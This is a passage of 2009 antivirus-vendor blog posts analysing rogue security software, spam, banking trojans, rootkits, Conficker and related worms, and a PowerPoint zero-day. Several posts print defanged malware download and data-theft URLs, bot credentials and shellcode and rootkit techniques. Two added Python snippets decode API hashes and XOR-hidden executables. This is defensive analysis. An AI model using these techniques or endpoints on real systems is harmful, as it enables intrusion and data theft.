It was very encouraging to see that more than 40 people came to Budapest, Hungary, to discuss and agree on new industry standards as part of the effort undertaken by the Anti-Malware Standards Organization (www.amtso.org.) The awesome historic surroundings set the mood for our discussions.

 Budapest

Seeing such a great turnout in the current economic climate shows how much AMTSO members care about raising the standards of testing anti-malware products. Especially considering the recent rise in the number of rogue security products (such as the now infamous “Anti-virus XP 2009”), it is clear that we need transparent and fair testing more than ever.

AMTSO members finalized and adopted several new documents to the current portfolio. (Have a look at the collection of documents here: www.amtso.org/documents.html.)

AMTSO documents

But I would like to draw your attention to two papers that, in my opinion, represent very significant steps for the security industry as a whole.

  • The first one is “AMTSO Analysis of Reviews Process,” and it presents the process of analyzing reviews. The creation of such a process paves the way to highlight great reviews and/or to expose substandard tests in public. (AMTSO promises to publish all the analyses they undertake.) I really hope that this process, designed to be transparent and fair, will improve the quality of testing and benefit both the developers and consumers of anti-malware technology. If you have doubts that this process is going to be unbiased I will remind you that AMTSO members work for competing security companies, and there would not be a snowball’s chance in hell to agree on the process if it were not designed to be fair. The next step is to put the “AMTSO Analysis of Reviews Process” into practice. I cannot wait to see how it will go.
  • “AMTSO Best Practices for Testing In-the-Cloud Security Products” is the second very important milestone. Some anti-virus products started using “cloud” technologies (such as McAfee’s Artemis, which was launched in the beginning of 2008) and the number of cloud-based products is growing; so there is a need to address the fundamental problems associated with testing solutions that are not under the control of the tester. (That is, part of the product is not “in the hands” of the tester; moreover, it can change at any moment in time.) I think it is amazing that representatives of so many competing security companies agreed on fair and scientific principles of how to test cloud-based products. To be honest, when we started this effort we were rather sceptical about finding a sensible way to address all the problems that testers face when evaluating such technologies. The adoption of AMTSO best practices for testing in-the-cloud products means that our brainstorming was successful. I am very pleased to see the agreed results adopted and published. Thanks for that effort go to all the security researchers who contributed to the document and all AMTSO members who voted for it.

McAfee Unveils H*Commerce Web Film Series on Cybercrime

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

FakeAlert Trojan Holds Systems For Ransom

In March 2009, we notified our customers of a new variant of the infamous Vundo Trojan family, which we detected as Ransom-F, and raised its risk assessment to a Low-Profiled threat. It was possibly the first indicator of a shift in the FakeAlert criminal model from instilling fear to holding information technology resources for ransom, but certainly not the last.

Last week, we came across a new variant of a rogue security program branded by its creators as “System Security 2009”; we detect it as FakeAlert-CO, and some of its past similarly branded cousins as FakeAlert-SystemSecurity.

The updated variants were discovered on a web page hosted on trustedw{blocked}security.com. Like most other rogue security programs to date, FakeAlert-CO displays spurious alerts and makes fraudulent claims of infections that require the user to pay a fee to “repair” them. Following the trend of Ransom-F, we noticed “new features” in FakeAlert-CO that resemble some common characteristics of ransomware Trojans.

Once installed, FakeAlert-CO may either terminate all running user processes or prompt the user to reboot.

In either case, it then pretends to perform a system scan and reports detections of false and exaggerated threats.

What sets it apart from older variants is that the user is no longer allowed to open or execute any applications, including Task Manager, Command Prompt and other system and office applications, which FakeAlert-CO terminates. A message is displayed to the user indicating that the files are infected and that, to resolve the issue, the user must activate FakeAlert-CO at a cost.


The “product” website is made to look fairly professional, offering an option to purchase a two-year license or a lifetime support license at a “discount,” and even comes with a 30-day money-back guarantee!

You may be paying for the “best” possible support option, but you can’t trust a “product” that holds your system for ransom.

Uninstalling the System Security “product” will not be an option for the typical user, as there is neither an uninstaller function, nor can “Add or Remove Programs” in the Control Panel be opened by the usual means.

However, the reported infected files are intact, and are not modified in any way. If the user boots into Safe Mode, FakeAlert-CO is not started automatically and system tools and applications can be executed and accessed normally.

Affected VirusScan users may remove this threat using the latest DATs and engine.

McAfee Releases First-Quarter Threats Report

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009” here.

Swine Flu Subjects and e-Pharmacy Sites

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

Swine Flu Spams

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

Swine Flu e-Pharm Site

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

A closer look at a Swine Flu spam

It's been just a few days since we started talking about spam that uses Swine Flu to catch users' attention and sell pills. This time, however, the message is not very “healthy”:

Swine Flu

The message above is in Portuguese, and goes like this: “For those who still don't know, the pictures below show the Swine Flu terminal stage; the experts are trying to calm people down, but the pictures show that calming down is the only thing we shouldn't do. See what the patient becomes in the advanced stage”.


As we saw yesterday in David's post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch users' attention. But remember, this is spam; they use this to make users believe that the news is true.


Links lead to two different malware files:

 

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar

=> Foto.29.04.2009.com

 

http://[removed].ru./uploaded/alerta.php?atencao=ver

=> Foto.29.04.2009.jpg.exe

 

They are identified as PWS-Banker-dldr and PWS-banker-gen.g

 

The file Foto.29.04.2009.com is a downloader which drop the URL below as C:\WINDOWS\temp\configura.exe

 

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

This file is identified as PWS-Banker-gen.b.

This is a common banker malware which overlays a fake image over the real banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter his personal information and even his credit card data:

overlaid bank image (sequence of three screenshots)

The information about the compromised machine and the banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php

hxxp://[removed-2].100webspace.net/post.php

hxxp://[removed-3].100webspace.net/post.php

hxxp://[removed-4].100webspace.net/post.php

This is the string appended to the URLs above:

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

But one image inside this malware caught our attention. The image below tries to disguise itself as the website of the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to look up information about Brazilian citizens:

overlaid image (SENASP look-alike)

They attempt to steal usernames and passwords for this site. If the miscreants got access to it, they would be able to obtain information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see, an apparently innocent e-mail could lead to your banking information being stolen, and could even have more serious implications, as in the case above.

Looking at Swine Flu Spam Globally

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers.

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend, and almost certainly not together in the same subject line, so we kinda started there. Using our TrustedSource technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject over the last several days:

Percent Increase of Swine Flu in Subject Line

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen them generated from all over the world, which is not really a surprise when one considers the global nature of botnets and spam, but the country breakdown is interesting to look at. It seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

Countries Sending Swine Flu Spam

No country is safe from spammers, eh? When you consider that on any given day there are between 80 and 170 billion email messages, with 78 to 90 percent of that number being spam, sending with the subject “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers’ disposal, and it is very hard to protect against.

April Email and Spam Volumes

We have also seen sites with the words “swine” and “flu” pushing malware. In this case it’s a redirect to a Russian-based site that requires our old friend, the fake codec, to be installed to view the movie:

Swine Flu Redirect to Fake Codec

Malware writers, spammers and scammers are lowlifes. They will use any high-profile media event or high-impact news story to push their wares, including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic, go to the World Health Organization website.

Beware of Shady Installers

Today I came across a program that claims to be an installer for the VLC media player. Innocent, right? Guess again. For starters, the installation file was different from that supplied by the legitimate VLC media player site.

At Step 3 of the installation I saw this dialog box:
Step 3 of Ransom-E installation

The translation of the message from French is, “HELP US IMPROVE OUR SERVICE. To obtain your activation code call [number removed]. To receive your code in SMS send the keyword CODE to [number removed].” This is a case of SMS fraud!

As usual, we shouldn’t install programs from sources that we don’t trust. In our case, we know from Step 3 of the installation that we’re dealing with fraudsters. So why continue with the installation? :-)

We detect this Trojan as Ransom-E, updated in the 5597 DATs.

StealthMBR gets a makeover

New variants of the StealthMBR trojan, aka the Mebroot rootkit, have recently been spotted in the wild. These new variants are significantly different from earlier ones.

StealthMBR has arguably been dubbed the stealthiest rootkit ever seen. The new variants use even ‘deeper’ techniques to evade detection. Broadly speaking, they hijack kernel objects (the disk device object) to filter access to the master boot record and prevent detection and repair. Whereas earlier variants installed lower-level hooks on the IRP table of \driver\disk, these new variants are able to hook the IRP table of an even lower driver. And these hooks are not present all the time; they are only installed on demand. The hijacked disk device object is used to facilitate this. Detection is not the only problem; this threat also poses cleaning challenges by installing watchdog mechanisms that re-infect the machine. The following image shows what an infected MBR looks like. Booting from an external medium and inspecting the MBR should reveal the infection.

Infected MBR

The following image shows the hijacked kernel object for the disk device.

Hijacked Object

Once installed, this threat does not require any file or registry entry to sustain itself on the compromised machine. But for installation to occur there is a dropper executable, which has also changed compared to older variants. Detection for the new droppers has been added as StealthMBR.a. The good thing is, we already had proactive detection for some of the dropped files as PWS-JA.gen.a. This should help identify problems and prevent users from getting infected in the first place. We have also developed a solution for detecting and removing this threat once a machine is compromised. It is currently under QA and will be delivered through regular DAT updates very shortly.

While we are on this subject, we also wanted to plug an upcoming webcast. We will be discussing the workings of the StealthMBR rootkit and how we deliver solutions for complex threats like these through regular DAT updates, without the need for special stand-alone tools. This webcast will also cover current rootkit trends and techniques. Come and learn how to prevent rootkit incidents in your environment and how to tackle such incidents if, unfortunately, they do occur. See you there!

Mac Malware In The News

There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

As we discussed in our previous blog, it is spread through pirated software at this point (a huge no-no anyway), so hopefully distribution will be light and will not result in large numbers. It definitely does highlight the need for security software regardless of platform!

Conficker on the prowl after the 1st…

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendezvous to start its latest escapade. In this case, the infected host is contacted initially by another host over an ad-hoc P2P connection, kind of like an alarm clock. Then, after hitting the snooze button for a period of several hours, the communication begins again, this time initiated by the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka the update) may go unseen, or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once decrypted and executed, it could turn out to be malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the screenshots below:

We have also seen some hosts serving up a Waledac payload. (Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time, however, it is closer to the original patch, so as to elude detection. (Note: our McAfee Conficker Detection tool is in the process of being redesigned to allow detection of the latest variants.)

There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as - Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. - Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves an HTTP rendezvous domain name, it compares the resolved IP with the list of IPs it has already queried; if the new IP is in the list, it moves on to the next domain in its list.

Of course, we will update if anything else comes along…

W32/Winemmem - Know Your Enemy

Do you remember what the first goal of file infector distribution is? It is demand. Without demand, infected files may never be downloaded by end users. What is the second goal? To stay undetected by most AV products. A week ago we found a new file infector that fits the bill.

Nowadays, instead of relying on mass mailing, malware authors are specifically attacking individual companies that produce popular software. We’ve been contacted by several software development companies with a similar issue: suspected malware on their machines. Somebody noticed that the hashes calculated for setup installers and packages distributed to millions of customers were different from what they should have originally been.

Brief reference - “Setup package installer application creates executable installation wizard of windows program without changing software functionality and data file integrity. Advanced setup creator tool generates program setup self extracting file by adding company name, version, setup name, desktop icon, copyright text, start menu icon, installation folder path and license agreement. Setup generator program includes multiple application files into single executable .exe setup with full install and uninstall feature.”

Packages (executable files) were self-protected using strong integrity checks, and some were digitally signed. This is common for professional setup builder tools producing self-extracting executables: the integrity of the installer is checked before uncompressing and extracting data, in order to protect the product and make sure it is not damaged or modified. Checksums and similar protection features are implemented in every popular self-extracting archive format (WinRar, WinZip), installer (NSIS, Astrum, InstallShield), and software protection system (ASProtect, Themida or Armadillo). If anything happens to the installer, e.g. a single byte is modified, the end user will be notified with an error message. But in this particular case none of the users reported any problems while running the packages/installers, and no warnings were raised by any AV products either.

We’ve received about 5 different samples. All executables were created with either commercial or open source setup builders, were packed, and contained an overlay (extra data at the end of the file), where installers typically keep compressed and/or encrypted data. Upon execution, the samples did not perform any visible or unexpected activity, and the extracted files were clean (the majority of the executables were digitally signed and had a valid signature). Since the files inside the installers are not modified, the only way the malware can be distributed is by modifying the installers themselves, so the Avert Labs Research Team was notified to take a closer look at the suspicious files.

Within about 30 minutes, a new generic signature, “W32/Winemmem”, was added to the database to detect the new file infector and clean the virus body, so that the detected virus is removed from the file and the file can be used safely.

Let’s go ahead and follow the virus logic to understand what it does and see how it was possible to infect installers and bypass self-integrity checking. W32/Winemmem infects packages, installers, and self-extracting archives (files with extra data, the so-called “overlay”). It rewrites the code section of the original application (1) and relocates a random-size block of code from the beginning of the code section and the OEP (2) to the end of the file (3 and 4 below, respectively), increasing the size of the extra data. This virus does not create new sections and does not modify the PE header. In order to gain control when an infected file is run, the virus rewrites the original code located at the entry point:

Once an infected executable is executed, the virus hooks the CreateFileA() API. W32/Winemmem gains control and searches for Windows PE executables in the Program Files folder. It then parses the Import Table and searches for system dynamic link libraries (DLLs) associated with the executables (EXEs). Next, the virus copies the found DLL to the same folder that contains the found EXE file and infects the copied DLL by modifying code at the entry point and appending the virus body to the end of the last section, so that malicious code is executed every time any of the infected EXE files are run. Upon execution of any “infected” file in the Program Files folder, the virus hooks the WS2_32.dll Send() API and performs its malicious activity the first time an infected application calls it. It may infect files on removable drives by searching the entire drive for suitable executables, or download and execute files from remote hosts.

So, since the original setup installer is modified and the code section and file sizes are changed, why doesn’t the application’s self-integrity check fire; why aren’t users warned? Once an infected file is executed, the virus restores the original application on disk by writing the data from the beginning of the code section and the OEP back to the file. Windows normally prevents exactly this: a running executable is locked and it is not possible to write to it. To bypass that, the virus drops a kernel-mode rootkit (MD5: CE769EAE2F1A7A4ED622C15E715D851E) and hooks a kernel-mode API located in ntoskrnl.exe (the function name is concealed for security reasons). According to our research, this routine is called by the file system before deleting or opening any file for write access. All the rootkit needs to do is hook the API and check its input parameters. That’s exactly what it does: it patches the first 8 bytes to return 1 in all cases, by rewriting the beginning of the API with two instructions:

With those 8 bytes you can delete any file on disk, no matter whether it is a running executable, a loaded dynamic link library, or any other file locked by some process. While testing it, I managed to delete the entire Windows folder without any errors or questions from the operating system.

But what is the purpose of hooking the ExitProcess() and ExitWindowsEx() APIs? Since the original file on disk no longer contains the virus body (remember, the virus is in memory and the file on disk was restored in order to bypass integrity checks), W32/Winemmem needs to infect the file again once the user tries to close the installer (ExitProcess) or reboot the system (ExitWindowsEx).

OK, what about the second goal I mentioned in the beginning: is it invisible to AV products? Even though it is not polymorphic, the majority of AV vendors, except for a few (not listed here) that catch the dropped rootkit, do not currently detect the virus (as of 07/04, as seen in these VirusTotal results):

Btw, this variant of W32/Winemmem keeps all the information necessary to restore the original file at a constant offset, unencrypted. If you are writing cleaning for this one, check the table located at OEP + 0x159. It contains the VAs and sizes of the stolen bytes.

Drive-by-Download Du Jour

LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

FakeAlert-BY

… then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY since the 5545 DATs, released on March 6.

Please update your AV signatures and stay secure!

Artemis in Action

“Artemis” is McAfee’s new cloud-computing technology, capable of detecting new malware threats in real time. In the last 48 hours our Artemis technology detected some malware that was targeted at certain regions of the world.

In North America, one particular sample was queried by Artemis more than 80 times from more than 60 unique (ISP, not end-point) IP addresses. This is highlighted in the first figure below by the dispersed nature of the red dots. Artemis had already detected this malware and offers extra protection over the regular DAT files. After further analysis we added detection for this sample in the regular DATs as a “Generic.dx” Trojan for Thursday’s DAT release.

This particular sample was seen only in North America. The red dot in the Pacific Ocean covers the islands of Hawaii, while the dot in Europe is from a well-known multi-AV scanner service vendor based in Spain. Presumably the sample was submitted there by someone in America! ;)

Sorry to pick on North America again, but another sample has popped up on our radar. As you can see, we didn’t have automatic protection for this but the various systems analyzing the threat details soon marked this as bad. These systems report that this sample has been seen only through our consumer (VirusScan Online) and SMB (ToPS) products. This sample has now been classified as a Spy-Agent.bw Trojan and will also be included in Thursday’s regular DATs.

Example 1:

Example 2:

New Conficker Variant

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

For measures to protect yourself and your organization against Conficker, please visit:

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

Happy Easter: Egg-Hunting With New PowerPoint Zero-Day Exploit

As a follow-up to my colleagues’ blog post about the newest Office exploits, here is an analysis of one of the Microsoft PowerPoint zero-day exploits that, once again, are used in targeted attacks to infect victims with a trojan horse. The malicious presentation files abuse a new, as yet unpatched hole in Microsoft PowerPoint and cause it to execute code infiltrated by the attackers. This blog post shows how the shellcode works and what it does right after an innocent victim opens the malicious file, if the attacker gets their way of course!

For size reasons, the code is split into several parts that are scattered throughout the malicious PowerPoint file. Part one of the shellcode consists of an “egghunter”, which is used to locate the remaining part of the shellcode in memory. In order to do that, it first sets up an exception handler that prevents crashes when accessing bad memory locations, then goes on a hunt for the shellcode’s prepended egg (0xD1CF11E0). Once that egg (which is a marker for the beginning of the shellcode’s second part) is found in memory, code execution is transferred to the code following it.

Part two of the shellcode begins with a loop that looks for a writable memory block of at least 1KB in size (starting at address 0x30000000). Another loop then XOR-decodes another part of the shellcode into that memory location and branches to it. Once decoded, a filename (“fssm32.exe”) can be seen in the disassembly. In order to either download or drop a second-stage executable, shellcode needs access to operating system API functions. The ones it needs are imported by parsing OS-internal structures, such as the Process Environment Block, to locate kernel32.dll, then parsing the library’s PE header to locate the desired function pointers.

As shellcode usually needs to fit into a size-limited block of memory, this piece of exploit not only has its code split into several parts for it to work reliably, it also uses 32-bit hashes of the API functions to import, rather than a list of the respective function names, which would consume more space. The shellcode’s ROR-13 hashing algorithm iterates over every exported API function name and compares the result against its given list at run time. Applying the same technique when statically analyzing the shellcode, the list of imported functions becomes readable. Looking at the now readable list, it does not contain any function which would indicate that the shellcode downloads a file; rather, it drops an embedded one from the PowerPoint file and executes it.
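The hash-matching step described above, as an added example that is neither the shellcode's own code nor the author's tooling: it computes the classic ROR-13 hash of candidate export names and maps hash constants lifted from a disassembly back to readable names. The export list and the hash list are constructed samples, and the assumed algorithm is the common form that does not hash the terminating NUL.

```python
"""Added example: turn ROR-13 API hashes found in shellcode back into names.

The candidate export names below are a constructed subset of kernel32.dll
exports; a real analysis would feed the full export table (e.g. read with
pefile) into build_hash_table().
"""

MASK32 = 0xFFFFFFFF


def ror13(value: int) -> int:
    """Rotate a 32-bit value right by 13 bits."""
    value &= MASK32
    return ((value >> 13) | (value << 19)) & MASK32


def ror13_hash(name: str) -> int:
    """ROR-13 hash as used by classic x86 API-resolving shellcode.

    For every byte of the ASCII name: rotate the accumulator right by 13,
    then add the byte. Assumption: the terminating NUL is not hashed.
    """
    h = 0
    for b in name.encode("ascii"):
        h = (ror13(h) + b) & MASK32
    return h


def build_hash_table(export_names):
    """Map hash -> export name for every candidate name (the analyst's side of
    the comparison the shellcode performs at run time)."""
    return {ror13_hash(n): n for n in export_names}


def resolve_hashes(hashes, table):
    """Return a readable import list; unknown hashes are reported as such."""
    return [table.get(h, f"unknown(0x{h:08x})") for h in hashes]


# Constructed sample: a handful of real kernel32.dll export names.
SAMPLE_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "GetTempPathA",
    "CreateFileA", "WriteFile", "CloseHandle", "WinExec", "ExitProcess",
]

# Constructed sample: hash constants as they might be lifted from a disassembly.
# The last one is deliberately not in the table to show the unknown case.
SAMPLE_SHELLCODE_HASHES = [0xEC0E4E8E, 0x7C0DFCAA, 0xDEADBEEF]


def demo():
    """Resolve the sample hash list against the sample export table."""
    return resolve_hashes(SAMPLE_SHELLCODE_HASHES, build_hash_table(SAMPLE_EXPORTS))


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```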

A hex search for typical indicators of an executable file, such as an “MZ” or “PE” header, doesn’t yield any useful results, which is not astonishing at all. Of course, the attackers responsible for building the exploit intended to prevent their cover being blown by something as obvious as an executable embedded in a PowerPoint presentation file! Looking more closely at the shellcode, there is another suspicious XOR-decoding loop.

The loop decrypts a given memory block using an 8-bit XOR key. By incorporating the same decryption loop into a Python script and applying it to the PowerPoint file (see screenshot below), both an MZ and a PE header surface in the hex editor. It’s the embedded executable that was assumed to be hiding between the PowerPoint “slides”; the malware can finally be extracted.
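The decoding step described above, as an added example that is not the author's script: it tries all 256 single-byte XOR keys over a document blob and reports where a decoded MZ/PE header surfaces. The document bytes and the key 0x5A are constructed for the demonstration; nothing here is taken from the malicious file.

```python
"""Added example: find a single-byte XOR-encoded PE image inside a document."""
import struct


def decode_xor8(data: bytes, key: int) -> bytes:
    """Decode (or encode; XOR is symmetric) a buffer with a single-byte key."""
    return bytes(b ^ key for b in data)


def looks_like_pe(buf: bytes, off: int) -> bool:
    """Validate the PE layout at `off`: 'MZ' at the start of the DOS header and
    e_lfanew (dword at +0x3C) pointing to the 'PE\\0\\0' signature."""
    if buf[off:off + 2] != b"MZ" or off + 0x40 > len(buf):
        return False
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    if not 0x40 <= e_lfanew < 0x1000:  # sane range for a real header
        return False
    pe_off = off + e_lfanew
    return buf[pe_off:pe_off + 4] == b"PE\x00\x00"


def find_xor_encoded_pe(data: bytes):
    """Try every 8-bit key and return (key, offset) for each decoded PE header.
    Key 0 is included, so a plain (unencoded) embedded executable is reported too."""
    hits = []
    for key in range(256):
        plain = decode_xor8(data, key)
        pos = plain.find(b"MZ")
        while pos != -1:
            if looks_like_pe(plain, pos):
                hits.append((key, pos))
            pos = plain.find(b"MZ", pos + 1)
    return hits


def make_sample(key: int, prefix: bytes) -> bytes:
    """Build a constructed 'document': filler bytes followed by a minimal
    XOR-encoded PE stub (DOS header with e_lfanew = 0x40, then the PE signature
    and an i386 Machine field)."""
    stub = bytearray(b"MZ" + b"\x00" * 0x3A)   # DOS header up to e_lfanew
    stub += struct.pack("<I", 0x40)            # e_lfanew
    stub += b"PE\x00\x00" + b"\x4c\x01"        # PE signature, Machine = 0x014C
    return prefix + decode_xor8(bytes(stub), key)


# Constructed sample document: 96 bytes of "slide text" then the encoded stub.
SAMPLE_DOC = make_sample(0x5A, b"slide text, slide text, " * 4)


if __name__ == "__main__":
    for key, off in find_xor_encoded_pe(SAMPLE_DOC):
        print(f"PE header surfaces with key 0x{key:02x} at offset 0x{off:x}")
```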

McAfee VirusScan products detect this threat as the Exploit-PPT.k trojan; McAfee Anti-Malware Gateway Edition (formerly Secure Computing) detects the new exploits as Heuristic.Exploit.OLE2.CodeExec.PGPG.

Donbot - Joining The Club of Million Dollar Botnets

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild. Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe. It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We successfully detect this rootkit as the Generic Rootkit.g trojan. It then establishes an outbound connection to a remote IRC server using the following credentials:

  • PASS h4xg4ng
  • NICK [00-USA-XP-9215671]
  • USER SP2-ojd, followed by the name of the infected computer.

This worm does indeed exploit the MS08-067 vulnerability, and uses a download-and-execute shellcode which behaves in an identical fashion to Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode which loads API libraries (i.e. urlmon.dll) and executes URLDownloadToFile() to download malware from already infected systems onto new targets. Unlike Conficker, which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

ShellCode

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself. The Metasploit framework has become a popular platform for security tool development and automation. As we can see, the latest version of Metasploit is not only used by whitehats for vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is no exception: it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as DCERPC service connection testing code located in the “client.rb” module. By using these routines, the new worm can conveniently determine which operating system and service pack it is targeting, to achieve a better infection success rate. The order in which W32/IRCbot.gen.a sends the attack packets is identical to Metasploit’s MS08-067 module (ms08_067_netapi.rb):

WireShark

Both Conficker and W32/IRCbot.gen.a use open source tools to their advantage in similar ways, making their work much easier.

We went on to investigate additional sites the worm connects to and the payload it tries to download. Packet sniffer logs show that it accesses at least two other remote servers:

  • hxxp://98.1[infected].42:443/n
  • hxxp://74.2[infected].90:88/jueo.exe

While the first server was not showing any activity at the time of research, the second server is still active and hosts additional malware that is installed onto infected machines:

VirusTotal

Well, hello Donbot! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C), detected generically as Generic.dx, appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet. While other botnets, namely Cutwail and Rustock, continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets, as they might not get another chance like the MS08-067 exploit for a long time.

This also serves as yet another reminder that there could well be many computers on the Internet that still do not have the latest security updates installed, more than 5 months after the release of the MS08-067 patch.

Google Searching for Madoff’s Yacht Leads to Fake Anti-Virus and Malware

